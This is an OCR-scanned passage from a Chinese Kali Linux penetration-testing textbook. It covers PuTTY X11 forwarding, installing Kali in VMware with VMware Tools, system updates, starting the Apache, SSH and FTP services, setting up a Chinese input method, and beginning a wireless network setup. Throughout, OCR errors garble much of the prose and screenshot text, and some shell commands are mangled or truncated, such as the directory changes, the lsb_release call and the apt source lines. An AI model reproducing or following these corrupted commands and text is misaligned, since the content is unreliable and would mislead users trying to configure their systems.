(9) 从 该 界面 可 以 看 到 Xming 软 件 安 六 完成。 此 时 单 击 Finish 按 钮 退出 设置 ， 并 且 
Xming 将 会 运行 。 如 果 不 想 要 Xming 和 启动 的 话 ， 将 Launch XmingBUTEL & ze TEE B 43] 
去 掉 。 

(10) 现在 打开 PuTTY 工 具 ， 人 Kali 系 统 的 I|P 地 址 ， 如 图 1 .32 所 示 。 然 后 在 


PuTTY 左 侧 栏 Category 下 依次 选择 Connection|SSHIX11 人 命令， 将 显示 如 图 1.42 所 
示 的 界面 。 
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R PuTTY Configuration ~ - — we 

















Options controlling SSH X11 forwarding 
X11 forwarding 
[V] Enable X11 forwarding 
X display location localhost:0) 
Remote X11 authentication proto 
o MIT-Magic-Cookje-1 © XDM-Authorization-1 
X authorty file for local display 



































E 1.42 BBi& PuTTY 


(11) 在 该 界面 选择 Enable X11 forwarding& 44E, 3f AEX display cani, 
的 文本 框 中 输入 localhost:0。 然 后 单 击 Open 按 钮 ， 启动 PuTTY 会 话 (一 定 要 确定 
Xming 在 后 台 运 行 ) 。 然 后 输出 Kali 系 统 的 用 户 名 和 密码 ， 成 功 连 接 至 sjKali 操 VEX 
统 ， 如 图 1.43 所 示 。 





ap 192.168.6.101 - PuTTY meor 
login as: root 

root8192.168.6.101's5s password: 

Linux kali 3.13.0 #1 PREEMPT Sun Jan 26 03:02:20 UTC 2014 armvél 








Ihe programs included with the Kali GNU/Linux system are free software; 


the exact distribution terms for each program are described in the 
individual files in /usr/share/doc/*/copyright. 


(Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent 
permitted by applicable law. 

Last login: Tue Jul 8 08:27:57 2014 from 192.168.6.102 
jjroocdkali: =f 








图 1.43 远程 连接 成 功 


(12) 从 该 界面 可 以 看 到 成 功 连 接 到 了 Kali 操 作 系 统 。 现 在 束 可 以 远程 连接 到 Kali 
的 图 形 界面 了 ， 执 行 命 分 如 下 所 示 : 
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root@kali:~# xfce4-session 


执行 以 上 命令 后 ， 将 远程 登录 到 Kali 系 统 的 泉 面 。 


e. : fEPUTTY F, startxtép AS BEis 1T. 


1.4.4 安装 至 VMware Workstation 


VMware Workstation 是 一 款 功 能 强大 的 果 面 虚拟 计算 机 软件 。 它 允许 用 户 在 单一 的 
果 面 上 同时 运行 不 同 的 操作 系统 。 用 户 在 其 中 可 以 进行 开发 、 测 试 和 部 署 新 的 应 用 
程序 。 目 前 最 新 版 本 是 10.0.1， 官 方 下 载 地 址 
https://my.vmware.com/cn/web/vmware/downloads。 本 小 节 闻 介绍 在 VMware 
Workstation 上 安装 Kali Linux 操 作 系 统 。 


(1) 启动 VMware Workstation， 将 显示 如 图 1.44 所 示 的 界面 。 


VMware Workstation cim) ES 
=F) WE) BEY) ERUM BET) BIH) 
X (3 Lal aj rud m (à LJ 


| È iB: 


vmware 


Workstation 10 





| | i Ea Ae ah 2E 
| BENER P > cuNESHLEWUONERTSS. 


i EREE 
5 et oie leet tate 


打开 虚 机 机 uen mim | | 
HE VMware Workstation gia BF, | 











1.44 VMware Workstation 10 
(2) 在 该 界面 单 击 “ 创 建新 的 虚拟 机 ”图标 ， 将 显示 如 图 1.45 所 示 的 界面 。 





新 建 虚拟 机 向 导 | 














欢迎 使 用 新 建 虚 拟 机 向 导 


您 希望 使 用 什么 类 型 的 醒 置 ? 


o 典型 (推荐 儿 T) 
通过 几 个 简单 的 步骤 创建 Workstation 10.0 
虚拟 机 。 


Bex (RC) 

BRERA SCSIITEI2 AI ER 
以 及 与 旧版 VMware camels SRSESOXTR 
的 虚拟 机 。 


vmware 
Workstation 





= 











1.45 新 建 虚拟 机 向 导 


(3) 该 界面 选择 安 委 虚拟 机 的 类 型 ， 包 括 " 典 型 "和 "* 目 定义 "两 种 。 这 里 推 存 使 用 " 典 
型 "的 方式 ， 然 后 单 击 "下 一 步 "按钮 ， 将 显示 如 图 1.46 所 示 的 界面 。 
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安装 客户 机 操作 系统 
虚拟 机 如 同 物理 机 ， 需 要 操作 系统 *。 SAMARAS MRE RR? 


”安装 来 源 : 
© 安装 程序 光盘 (D): 
cf} BD-ROM 驱动 器 (F:) 


O 支 装 程序 光盘 映像 文件 (so)(M): 
[ENISO 和 镇 像 文件 WaiNalHinux-1.0.5-386.sg -| | SHARIR)... 


























' 稍 后 安装 操作 系统 (5)。 
BREMEN AS —T TERME : 





1.46 安装 客户 机 操作 系统 


(4) 该 界面 用 来 选择 如 何 安 沪 客 户 机 操作 系统 。 这 里 选择 “各 后 安 沪 操作 系统 "， 然 


后 单 击 “ 下 一 步 "按钮 ， 将 显示 如 图 1.47 所 示 的 界面 。 
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此 虚拟 机 中 将 安装 哪 种 操作 系统 ? 








客户 机 操作 系统 

| © Microsoft Windows(W) 

| $9 Linux(L) | 
© Novell NetWare(E) | 
© Solaris(S) | 
t» VMware ESX(X) | 
口 其 他 (0) 

















1.47 选择 客户 机 操作 系统 


(5) 在 该 界面 选择 要 安装 的 操作 系统 和 版 本 。 这 里 选择 Linux 操 作 系 统 ， 有 版 本 为 其 
(Linux 2.6.X 内 核 ， 然 后 单 击 “ 下 一 步 ? 按 钮 ， 将 显示 如 图 1.48 所 示 的 界面 。 


1.4 ZzXKali Linux 3/ 
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大 所 机 使 用 什么 名 称 ? 
虚拟 机 名 称 (V): 
Kali Linux 
位 置 (L): 
D:\Kal 
在 “编辑 >“ 首选 项 “中 本 更改 默 认 位 置 。 | 


| 


1.48 命名 虚拟 机 


(6) 在 该 界面 为 虚拟 机 创建 一 个 名 称 ， 并 设置 虚拟 机 的 安生 人 位置。 设置 完成 后 ， 
单 击 “下 一 步 "按钮 ， 将 显示 如 图 1.49 所 示 的 界面 。 
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新 建 虚拟 机 向 导 


Js 


Sorge m 
碰 盘 大 小 为 多 少 ? 





pg = Es Ae ES in 。 这 些 文件 最 初 很 
小 ， 随 着 您 向 虚 氛 机 中 添加 应 用 程序 、 文 件 和 数据 而 逐 芹 变 大 。 


重大 三 盘 大 小 (68 儿 5 上 5 中 0 = 
针对 其 他 Linux 2.6.x AE BB): 8 GB 


O RENHET AO) 


| 。 夯 将 虚 羽 磋 盘 拆 分 成 杀 个 文件 (M) 
He. PTOI STEHT EM ZITBEEN (DATAGRAM 





图 1.49 指定 磁盘 容量 


(7) 在 该 界面 设置 侯 盘 的 容 T8. 如 果 有 足够 大 的 磁盘 时 ， 建 议 设 置 的 磁盘 容量 大 
ns ME 不 足 。 这 里 设置 为 50GB， 然 后 单 击 “* 下 一 步 ? 搜 钮 ， 将 显示 如 
图 1.50 所 示 的 界面 。 


1.4 安 委 Kali Linux 39 


大 学 霸 Kali Linux 安全 渗透 教程 
















已 准备 好 创建 虚拟 机 
HEAR BRR EIU > RELER 其 他 Linux 2.6.x 内 核 。 


Kali Linux 

D:\Kal 

Workstation 10.0 
其 他 Linux 2.6.x AIE 


50 GB, 拆 分 

256 MB 

NAT 

CD/DVD, USB 12853, 打印 机 , 声卡 











图 1.50 已 准备 好 创建 虚拟 机 


(8) 该 春 面 显示 了 所 创建 虚拟 机 的 详细 信息 ， 此 时 融 可 以 创建 操作 系统 了 。 人 然后 
单 击 “ 完 成 "按钮 ， 将 显示 如 图 1.51 所 示 的 界面 。 
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回 Kali Linux - VMware Workstation 


mier — 





XHA RE) EEV ”虚拟 机 (M) EET) MH) 
@ 主页 E3 Kali Linux 
GH Kali Linux 


b EGRE . 
Gy asser"ncm 


- 设备 
NN T 256 MB 
L] cheese 1 
-— A ER(SCSI) 30 GB 
jCD/DVD (IDE) ”自动 检测 E 


ENTE 95 NAT 
USB 控制 器 存在 





4$ 声卡 Bae 
wi fTEDN rt 
acr ku = 虚拟 机 详细 信息 
we xu 
-iif ewe: D:\Kali\Kali Linux.venx 
re aaa MARAE: Workstation 10.0 Æt 


E 


== 






































1.51 创建 虚拟 机 


(9) 该 界面 显示 了 新 创建 的 虚拟 机 的 详细 信息 。 现 在 准 各 安装 Kali Linux。 在 安装 
Kali Linux 之 前 需要 设置 一 些 信 息 ， 在 VMware Workstation 窗 口中 单 击 “编辑 虚拟 机 
设置 ?， 将 显示 如 图 1.52 所 示 的 界面 。 
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ERU 
guis (c) 
v 启动 时 连接 (D) 


连接 

© VRBES): 
Euri. 

& s ISO BRM): 
[SOURS FF \Kall\kal-inux = 





































































































1.52 虚拟 机 设置 


(10) 在 该 界面 选择 "CD/DVD (IDE) “选项 ， 接 着 在 右 侧 选择 "使 用 ISO 了 映像 文 
件 " 复 选 框 ， 单 击 “ 浏 览 " 按 钮 ， 选 择 Kali Linux 的 映像 文件 。 然 后 单 击 “确定 ”按钮 ， 将 
返回 到 图 1.51 所 示 的 界面 。 


(11) 在 图 1.51 界 面 ， 选 择 “ 开 和 启 此 虚拟 机 " 命 售 ， 将 显示 一 个 新 的 窗口 ， 如 图 1.53 
所 示 。 
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ALD LACIE 


Boot menu 


Live (666-pae) 

Live (686-pae failsafe) 
Live (forensic mode) 
Install 
Graphical install 


Install with speech synthesis 





Press ENTER to boot or TAH to edit a menu entry 


图 1.53 安装 界面 
(12) 接 下 来 的 安 丢 过程 和 在 第 1.4.1 小 节 中 介绍 的 过 程 一 样 了 ， 这 里 融 不 再 资 述 。 


1.4.5 安装 VMware Tools 


VMware Tools 是 VMware 虚拟 机 中 上 自 带 的 一 种 增强 工具 。 它 是 VMware 提供 的 增强 
虚拟 显卡 和 硬 瘟 性 能 ， 以 及 同步 虚拟 机 与 主机 时 钟 的 驱动 程序 。 只 有 在 VMware 虚 
拟 机 中 安装 好 VMware Tools 工 具 后 ， 才 能 实现 主机 与 虚拟 机 之 间 的 文件 共享 ， 同 时 
可 文 持 自由 抑 暇 的 功能 ， 鼠 标 也 可 在 虚拟 机 与 主机 之 间 自 由 移动 (不 用 再 按 Ctrl+Alt 
组 合 键 ) 。 本 小 节 将 介绍 VMware Tools 程 序 的 安装 。 


(1) 在 VMware Workstation3ie € 4 FB, AZAR 1" Hz 40V | Ec VMware 
Tools...” 谷 分， 如 图 1.54 所 示 。 


虚拟 机 (IM) | 标签 (T) ”帮助 (H) 
( EF ; 


) 可 称 动 设备 (D) d 
E Ctrl -- Shift- P 


EE 发送 Ctrl+Alt+Del 

EL. Ctrl+G 
Ko WEEN) " 
ERIC) Ctrl - Alt - PrtScn 
EM) + 
a VMware Tools... 





Ey GER). Ctrl+D 
1.54 安装 VMware Tools 
(2) #£#% VMware Tools 安 装 程序 到 /mnt/cdrom/ 目 录 。 执 行 命令 如 下 所 示 : 


root@kali:~# mkdir /mnt/cdrom/ HOUBERA 
root@kali:~# mount /dev/cdrom /mnt/cdrom/ # 挂 载 安装 程序 
mount: block device /dev/srO is write-protected, mounting read-only 


Hii 
看 到 以 上 的 输出 信息 ， 表 示 VMware Tools 安 装 程序 挂 载 成 功 了 。 
(3) 切换 到 挂 载 位 置 ， 解 压 安 装 程 序 VMwareTools。 执 行 命令 如 下 所 示 : 





root@kali:~# cd /mnt/cdrom/ # 切 换 目 录 
root@kali:/mnt/cdrom# ls 查看 当前 目录 下 的 文件 


manifest.txt VMwareTools-9.6.1-1378637.tar.gz vmware-tools-upgradei 
run_upgrader.sh vmware-tools-upgrader - 32 
root@kali:/mnt/cdrom# tar zxvf VMwareTools-9.6.1-1378637.tar.gz -C 


a] E 1 


iiTlLAEte Sig, VMware Toolsf FERE x: 2/8 eA, HERTE 7; vmware- 
tools-distrib X 4t +., 


(4) 切换 到 VMware ToolsBJE #, fi fg ARER. dif áp S RAZ : 





rootQkali:/mnt/cdromz cd /vmware-tools-distrib/ # 切 换 目 录 


root@kali:/vmware-tools-distrib# ./vmware-install.pl #217 2j 


执行 以 上 命 伯 后， 会 出 现 一 些 问 题 。 这 时 按 下 " 回 车 ” 键 ， 授 受 默认 值 。 
(5) 重新 启动 计算 机 。 


1.5 Kali 更 新 与 升级 


当 用 户 使 用 一 段 时 间 以 后 ， 可 能 对 总 是 在 没有 任何 变化 的 系统 中 工作 感到 不 满 ， 而 
是 渴望 能 像 在 Windows 系 统 中 一 样 ， 不 断 对 自己 的 Linux 进 行 升级 。 另 外 ，Linux 本 
身 束 是 一 个 开放 的 系统 ， 每 天 都 会 有 新 的 软件 出 现 ，Linux 发 行 套件 和 内 核 也 在 不 断 
更 新 。 在 这 样 的 情况 下 ， 学 会 对 Linux 进 行 升 级 融 显 得 非常 迫切 了 。 本 节 将 介绍 Kali 
的 更 新 与 升级 。 


更 新 与 升级 Kali 的 具体 操作 步骤 如 下 所 示 。 


(1) 在 图 形 界面 依次 选择 "应 用 程序 "| 系统 工具 "| 软件 更 新 " 命 仿 ， 将 显示 如 图 1.55 
所 示 的 界面 。 


A 软件 更 新 查看 器 正 以 特权 用 户 身 份 运行 


软件 包 管 理 怖 对 安全 性 是 敏感 的 。 
出 于 安全 原因 ， 应 如 免 以 特权 用 尸身 份 运 行 图 形 界面 应 用 程序 。 





| BUB) 确认 继续 (A) 


| 





车 = 
41.55 警告 信息 


(2) 该 界面 提示 确认 是 否 要 以 特权 用 户 身 份 运行 该 应 用 程序 ， 如 果 继 续 ， 单 击 " 确 
认 继 续 ? 按 钮 ， 将 显示 如 图 1.56 所 示 的 界面 。 
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v 


345 个 更 新 可 用 
软件 更 新 可 更 正 软件 中 的 错误 、 


An 802.11 WEP and WPA-PSK key cracking program 


aircrac k-ng-1l ?-beta3-Okalil (32 fW) 


Apache HTTP Server metapackage 
2-13-4deb7ul (32 位 ) 


^um Pal a ar JJ. jJ E. 3 
dpa. HF & & ia d 


Apache HTTP Server 


apache2-mpm-prefork-2.2.22-13-deb7u1l (32 位 ) 
utility die: for webservers 
apache Z-utils- Z. 2.22-13--deb /ul (32 iu 


Apache HTTP TRIN common sada dae 


apache 2, 2-bin- 2. 2 ‘-134+deb/ul | i 


Apache HTTP Server common files 
ful (32 位 ) 


E ma 5 P, eh greet 0s m » "» 7027 3 zd as 
apache 2. 2-common- 2. 2.2 2-13 deb 


A tool for reverse engineering Android apk files 


9 详细 信息 


需 重新 启动 。 


已 选 定 345 个 更 新 (971.5 MB) 


1.56 软件 更 新 


(3) 该 界面 显示 了 总 共有 345 个 软件 包 需 要 更 新 ， 


图 1.57 所 示 的 界面 。 


1.5 Kali 更 新 与 升级 


- traditional non-threaded model 


修补 安全 漏洞 以 及 提供 新 功能 。 


1.4 KB 


162.5 KE 
— 
c31.l1 KE 

2.5 ME 


BHO | REND 


ŽARA, CRPXCRGUD 
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Ch 需要 额外 的 确认 
欲 更 新 以 下 软件 包 ， 有 其 他 软件 需要 被 修改 。 


| 安装 | 删除 | 


为 了 满足 依赖 关系 ， 还 需要 安 闪 以 下 软件 : 630.2 MB 








= arp scanning and fingerprinting tool | 


ah Ethernet/F DDI station activity monitor 


ah light download accelerator - console versi 


ah Microsoft Cabinet file unpacker 


mh Configuration tool for amateur radios 





-不 再 显示 


























”取消 (C) || ”继续 
图 1.57 依赖 软件 包 


(4) 该 界面 显示 了 安 洲 更 新 软件 已 依赖 的 软件 已 ， 单 击 “ 继 续 " 按 钮 ， 将 显示 如 图 
1.58 所 示 的 界面 。 


1.5 Kali 更 新 与 升级 
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软件 更 新 . 


345 个 更 新 可 用 
软件 更 新 可 更 正 软件 中 的 错误 、 修 补 安全 漏洞 以 及 提供 新 功能 ， 





D 


. Browser Exploitation Framework (BeEF) — bundled ruby li... 8 
A firmware analysis tool 
Bluetooth scanner and Logger 
Mass SNMP scanner 
Bully is a new implementation of the WPS brute force att... 
Metwork sniffer to extract CDP information 


Custom wordlist generator 


- 详细 信息 
@ a 正在 下 载 软件 包 
已 选 定 345 个 更 新 (971.5 MB) 18 i (Q) | 


图 1.58 软件 更 新 过 程 
(5) 从 该 界面 可 以 看 到 软件 更 新 的 一 个 进度 。 在 该 界面 ， 可 以 看 到 各 软件 包 的 一 


个 不 同 状态 。 其 中 ， 软 件 包 后 面 出 现 加 图标， 表示 该 软件 包 正 在 下 载 ; 如 果 显示 





ib. 表示 软件 包 已 下 载 ; "MM Xo 图 标的 话 ， 表 示 安 装 





完 该 软件 包 后 ， 要 重新 启动 系统 ; 这 些 软 件 包 安 玫 成 功 后 ， 将 显示 为 图 
标 。 ere "按钮 ， 然 后 重新 启动 系统 。 在 更 新 的 过 程 中 ， 未 下 载 的 软件 
包 会 目 动 跳 到 第 一 列 。 此 时 ， 滚 动 鼠 标 是 无 用 的 。 


(6) 重新 启动 系统 后 ， 登 录 到 有 系统 执行 lsb_release -a 命 合 查 看 当前 操作 系统 的 所 
有 版 本 信息 。 执 行 命令 如 下 所 示 : 


root@kali:~# lsb release -a 

No LSB modules are available. 

Distributor ID: Debian 

Description: Debian GNU/Linux Kali Linux 1.0.6 
Release: Kali Linux 1.0.6 

Codename: n/a 





从 输出 的 信息 中 ， 可 以 看 到 当前 系统 版 本 为 1.0.6。 以 上 命 合适 用 于 所 有 的 Linux， 
包括 RedHat、SuSE 和 Debian 等 发 行 版 。 如 果 仅 查看 版 本 号 ， 可 以 查看 /etc/issue 文 
件 。 执行 命令 如 下 所 示 


root@kali:~# cat /etc/issue 
Kali GNU/Linux 1.0.6 ^n \l 


从 输出 的 信息 中 ， 可 以 看 到 当前 系统 的 版 本 为 1.0.6。 


1.6 BAKE 


在 前 面 学 习 了 Kali Linux ERAR, BREKDBMAIWSRAI,MAT. SEM 
统 后 ， 融 可 以 使 用 各 种 的 渗透 工具 对 计算 机 做 测试 。 为 了 方便 后 面 章 节 内 容 的 学 
习 ， 本 节 将 介绍 一 下 Kali Linux 的 基本 设置 。 

1.6.1 启动 默认 的 服务 


Kali Linux 自 带 了 几 个 网 络 服务 ， 它 们 是 非常 有 用 的 。 但 是 默认 是 禁用 的 。 在 这 里 ， 
将 介绍 使 用 各 种 方法 设置 并 启动 每 个 服务 。 


1. 启动 Apache 服 务 
启动 Apache 服 务 。 执 行 命 分 如 下 所 示 : 


root@kali:~# service apache2 start 


[ok] Starting web server: apache2. 


输出 的 信息 表示 Apache 服 务 已 经 和 启动。 为 了 确认 服务 是 否 正 在 运行 ， 可 以 在 浏览 器 
中 访问 本 地 的 地 址 。 在 浏览 器 中 访问 本 地 的 地 址 ， 如 果 服 务 器 正在 运行 ， 将 显示 如 
1.59 所 示 的 界面 。 


Iceweasel 
File Edit View History Bookmarks Tools Help 
| http://192.168.41,235/ (F | 
€ [3121984125 ~-@) (ane a Qf 


fe Most Visited He Offensive Security “a Kali Linux '& Kali Docs KBExploit-DB Wh Aircrack-ng 


It works! 


This is the default web page for this server. 

The web server software is running but no content has been added, yet. 
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2. 启动 Secure Shell (SSH) 服务 

É xj Secure Shell (SSH) 服务 。 执 行 命 爷 如 下 所 示 : 


root@kali:~# service ssh start 
[ok] Starting OpenBSD Secure Shell server: sshd. 


看 到 以 上 的 输出 表示 SSH 服 务 已 经 和 启动。 为 了 确认 服务 的 闯 口 是 否 稚 监 听 ， 执 行 如 
下 所 示 的 命 分 : 


root@kali:~# netstat -tpan | grep 22 
tcp O 4.0 0.0.0.0:22 0.0.0.0:* LISTEN 7658/sshd 
tcp6 0 82 ea LISTEN 7658/sshd 


3. 启动 FTP 服 务 


FTP 服 务 默认 是 没有 安装 的 ， 所 以 首先 需要 安装 FTP 服 务 器 。 在 Kali Linux 操 作 系 统 
的 软件 源 中 默认 没有 提供 FTP 服 务 器 的 安 淫 包 ， 这 里 需要 配置 一 个 软件 源 。 配 置 软 
件 源 的 具体 操作 步骤 如 下 所 示 。 


(1) 设置 APT 源 。 向 软件 源 文件 /etc/apt/sources.list 中 添加 以 下 几 个 镜像 网 站 。 执 
{Jip 4S MI RATA : 


root@kali:~# vi /etc/apt/sources.list 

deb http://mirrors.neusoft.edu.cn/kali/ kali main non-free contrib 
deb-src http://mirrors.neusoft.edu.cn/kali/ kali main non-free con! 
deb http://mirrors.neusoft.edu.cn/kali-security kali/updates main «í 


F | | im m m m m m m m m m m m m m m m m mm Em Em mm m m m m m m m m m m mm m 


添加 完 以 上 几 个 源 后 ， 将 保存 sources.list 文 件 并 退出 。 在 该 文件 中 ， 添 加 的 软件 源 
是 根据 不 同 的 软件 库 分 类 的 。 其 中 ，deb 指 的 是 DEB 包 的 目录 ; deb-src 指 的 是 源码 
Ax. 如 果 不 自 己 看 程序 或 者 编译 的 话 ， 可 以 不 用 指定 deb-src。 由 于 deb-src 和 deb 
是 成 对 出 现 的 ， 可 以 不 指定 deb-src， 但 是 当 需 要 deb-src 的 时 候 ，deb 是 必须 指定 
的 。 


(2) 添加 完 软 件 源 ， 需 要 更 新 软件 包 列 表 后 才 可 以 使 用 。 更 新 软件 包 列 表 ， 执 行 
命令 如 下 所 示 : 





root@kali:~# apt-get update 


更 新 完 软 件 列 表 后 ， 会 目 动 退出 程序 。 
(3) 安 委 FTP 服 务 右 。 执 行 命令 如 下 所 示 : 


root@kali:~# apt-get install pure-ftpd 


安 疼 成 功 FTP 服 务 器 ， 融 可 以 启动 该 服务 了 。 执 行 合 分 如 下 所 示 : 


root@kali:~# service pure-ftpd start 


4. 安 沪 中 文 输 入 法 


Kali Linux 操 作 系 统 默 认 也 没有 安 猜 中 文 输 入 法 ， 下 面料 介绍 安 疲 小 企 笋 中 文 输入 
法 。 执 行 命令 如 下 所 示 : 


root@kali:~# apt-get install fcitx-table-wbpy ttf-wqy-microhei ttf. 
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root@kali:~# fcitx 


root@kali:~#[ INFO] /build/buildd-fcitx 4.2.4.1-7-1386-14w6Z /fcitx: 
[INFO] /build/buildd-fcitx 4.2.4.1-7-1386-l14w6Z /fcitx-4.2.4.1/src, 
[INFO] /build/buildd-fcitx 4.2.4.1-7-1386-l14w6Z /fcitx-4.2.4.1/src, 
[INFO] /build/buildd-fcitx 4.2.4.1-7-1386-l14w6Z /fcitx-4.2.4.1/src, 
[INFO] /build/buildd-fcitx 4.2.4.1-7-1386-14w6Z /fcitx-4.2.4.1/src, 
[INFO] /build/buildd-fcitx 4.2.4.1-7-1386-l14w6Z /fcitx-4.2.4.1/src, 
[INFO] /build/buildd-fcitx 4.2.4.1-7-1386-14w6Z /fcitx-4.2.4.1/src, 
[INFO] /build/buildd-fcitx 4.2.4.1-7-1386-l14w6Z /fcitx-4.2.4.1/src, 
[INFO] /build/buildd-fcitx 4.2.4.1-7-1386-14w6Z /fcitx-4.2.4.1/src, 
[INFO] /build/buildd-fcitx 4.2.4.1-7-1386-l14w6Z /fcitx-4.2.4.1/src, 
[INFO] /build/buildd-fcitx 4.2.4.1-7-1386-1l14w6Z /fcitx-4.2.4.1/src, 
[INFO] /build/buildd-fcitx 4.2.4.1-7-1386-l14w6Z /fcitx-4.2.4.1/src, 
[INFO] /build/buildd-fcitx 4.2.4.1-7-1386-14w6Z /fcitx-4.2.4.1/src, 
[INFO] /build/buildd-fcitx 4.2.4.1-7-1386-l14w6Z /fcitx-4.2.4.1/src, 
[INFO] /build/buildd-fcitx 4.2.4.1-7-1386-l14w6Z /fcitx-4.2.4.1/src, 
[INFO] /build/buildd-fcitx 4.2.4.1-7-1386-l14w6Z /fcitx-4.2.4.1/src, 
[INFO] /build/buildd-fcitx 4.2.4.1-7-1386-1l14w6Z /fcitx-4.2.4.1/src, 
[INFO] /build/buildd-fcitx 4.2.4.1-7-1386-l14w6Z /fcitx-4.2.4.1/src, 
[INFO|] /build/buildd-fcitx 4.2.4.1-7-1386-l14w6Z /fcitx-4.2.4.1/src, 
[INFO] /build/buildd-fcitx 4.2.4.1-7-1386-l14w6Z /fcitx-4.2.4.1/src, 
[INFO] /build/buildd-fcitx 4.2.4.1-7-1386-l14w6Z /fcitx-4.2.4.1/src, 
[WARN] /build/buildd-fcitx 4.2.4.1-7-1386-l14w6Z /fcitx-4.2.4.1/src, 
Ej ———SSeoOlLOCLLULULALHLAZENAES mj 





输出 的 信息 表示 ， 该 输入 法 在 启动 时 加 载 的 一 些 配置 文件 。 最 后 一 行 提 示 需 要 设置 
环境 变量 XMODIFIERS， 菏 些 程序 往往 因为 XMODIFIERS 环 境 变 量 设 置 不 正人 硼 导 
致 点 用 程序 无 法 使 用 。 设 置 XMODIFIERS 环 境 变量 方法 如 下 (以 Bash 为 例 ) 


export XMODIFIERS="@im=YOUR_XIM_NAME" 


语法 中 的 YOUR_XIM_NAME 为 XIM 程 序 在 系统 注册 的 名 字 。 应 用 程序 启动 时 会 增 
加 该 变量 查找 相应 的 XIM 服 务 器 。 因 此 ， 即 便 系 统 中 同时 运行 了 若干 个 XIM 程 序 ， 
一 个 应 用 程序 在 某 个 时 刻 也 只 能 使 用 一 个 XIM 输 入 法 。 


fcitx 缺 省 注册 的 XIM 名 为 fcitx， 但 如 果 fcitx 启 动 时 XMODIFIERS 已 经 设置 好 ，fcitx 会 
自动 以 系统 的 设置 来 注册 合适 的 名 字 。 如 果 没 有 设置 好 ， 使 用 以 下 方法 设置 。 


一 般 可 以 在 ~/.bashrc 文 件 中 添加 以 下 内 容 。 如 下 所 示 : 


export XMODIFIERS="@im=fcitx" 
export XIM=fcitx 
export XIM_PROGRAM=fcitx 


添加 并 保存 以 上 内 容 后 ， 重 新 登录 当前 用 户 ，fcitx 输 入 法 将 自动 运行 。 如 果 没 有 局 
动 ， 则 在 终 疹 执行 如 下 命令 : 


root@kali:~# fcitx 


执行 以 上 命令 后 ， 将 会 在 屏幕 的 右上 角 漳 出 一 个 键 盐 ， 说 明 该 输入 法 已 经 启动 。 小 
企 掀 输入 法 默认 支持 汉语 、 拼 音 、 双 拼 和 五 笔 拼 音 四 种 输入 法 ， 这 几 种 输入 法 默认 
使 用 Ctrl+Shift 组 合 键 切 换 。 


如 果 想 要 修改 输入 法 之 间 的 切换 键 ， 右 击 昌 面 右上 角 的 键 意 ， 将 弹出 如 图 1.60 所 示 
的 界面 。 





1.60 fcitx 界 面 


大 学 霸 Kali Linux 安全 渗透 教程 


在 该 界面 选择 "配置 " 命 分 ， 将 显示 如 图 1.61 所 示 的 界面 。 在 该 春 面 单 击 “ 全 局 配置 " 标 


签 ， 将 显示 如 图 1.62 所 示 的 界面 。 





























avr war are 
切换 激活 / 非 激活 输入 法 CTRLSPACE - 





额外 的 激活 输入 法 快捷 键 左 Ctrl 








取消 激活 输入 法 

局 用 输入 法 间 切 换 wv 

输入 法 切换 键 Ctrl+Shift 
双击 切换 键 时 切换 


图 1.62 全 局 配置 
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从 该 界面 可 以 看 到 各 种 快捷 键 的 设置 ， 根 据 自己 习惯 用 的 快捷 键 进 行 设置 。 设 置 完 
后 ， 单 击 “ 应 用 ”按钮 。 


5. 停止 服务 
停止 一 个 服务 的 语法 格式 如 下 所 示 : 


service <servicename> stop 


<Servicename> 表 示 用 户 想 要 停止 的 服务 。 


停止 Apache 服 务 ， 执 行 命 令 如 下 所 示 : 


root@kali:~# service apache2 stop 
[ ok ] Stopping web server: apache2 .. waiting. 


从 输出 的 信息 中 ， 可 以 看 到 Apache 服 务 停止 成 功 。 
6. 设置 服务 开机 启动 
设置 服务 开机 启动 的 语法 格式 如 下 所 示 : 


update-rc.d -f <servicename> defaults 


<servicename> 表 示 用 户 想 要 开机 启动 的 服务 。 
设置 SSH 服 务 开 启 目 启动 : 


root@kali:~# update-rc.d -f ssh defaults 

update-rc.d: using dependency based boot sequencing 

update-rc.d: warning: default stop runlevel arguments (© 1 6) do ne 
insserv: warning: current start runlevel(s) (empty) of script ‘ssh 
insserv: warning: current stop runlevel(s) (2 3 4 5) of Script ssl 


E za 上 


从 输出 的 信息 中 可 以 看 到 ，SSH 服 务 默 认 启 动 了 2、3、4 和 5 运行 级 别 。 则 以 后 系统 
重启 后 ，SSH 服 务 将 目 动 运行 。 





1.6.2 设 生 无线 网 络 


无 线 网 络 既 包括 允许 用 户 建立 远 距 离 无 线 连 援 的 全 球 语 吾 和 数据 网 络 ， 也 包括 近 距 
离 无 线 连接 进行 优化 的 红外 线 扩 术 及 射频 技术 。 本 小 节 将 介绍 Wicd 网 络 寓 理 器 的 设 
置 ， 使 用 它 安全 的 连接 到 无 线 网 络 。 设 置 无 线 网 络 能 让 用 户 很 好 地 使 用 Kali Linux 无 
线 ， 做 渗透 测试 ， 而 不 需要 依赖 一 个 以 太 网 ， 这 样 使 的 用 户 使 用 电脑 非常 的 自由 。 


设置 无 线 网 络 的 具体 操作 步骤 如 下 所 示 。 


(1) 启动 Wicd 网 络 管 理 器 。 有 两 种 方法 ， 一 种 是 命 爷 行 ， 一 种 是 图 形 界面 。 在 呆 
面 依次 选择 "应 用 程序 "互联 网 "Wicd Network Manager 命 令 ， 将 显示 如 图 1.63 所 示 
的 界面 。 如 果 在 图 形 桌 面 上 找 不 到 WicdNetwork Manager， 那 说 明 系 统 中 没有 安装 
Wicd 软 件 包 。 用 户 可 以 在 添加 /删除 软件 中 ， 找 到 Wicd 软 件 包 安 禾 上 即 可 。 


Be ER MUTT 8D P698 : 


wicd-gtk --no-tray 


执行 以 上 命 售后， 将 显示 如 图 1.63 所 示 的 界面 。 
Wicd 网 络 管理 器 从 
网 络 (N) O 关闭 wi-Fi SOS! 刷新 ce 首选 项 v 
从 以 下 网 络 选择 : 


~*~ 


Testl 100% WEP 频道 1 
— 自动 连接 到 此 网 络 
_ 自动 连接 到 此 网 络 


连接 (0) | | 属性 


yztxtyOO2 100% WPA2 频道 1 
自动 连接 到 此 网 络 
wll c 自动 连接 到 此 网 络 
连接 (0O) | | 属性 








yztxty 100% WPA2 频道 11 
D 自动 连接 到 此 网 络 

alll 0 自动 连接 到 此 网 络 
连接 (DO)| | 属性 


已 连接 到 有 线 网 络 (IP: 192.168.6.101) 





1.63 Wicd 网 络 管理 器 

(2) 从 该 界面 可 以 看 到 所 有 能 搜索 到 的 无 线 网 络 ， 并 且 很 清楚 的 看 到 每 个 无 线 网 
络 的 加 密 方法 、 使 用 的 频道 及 无 线 信 号 的 强度 。 本 例 中 选择 使 用 WEP 加 密 的 无 线 网 
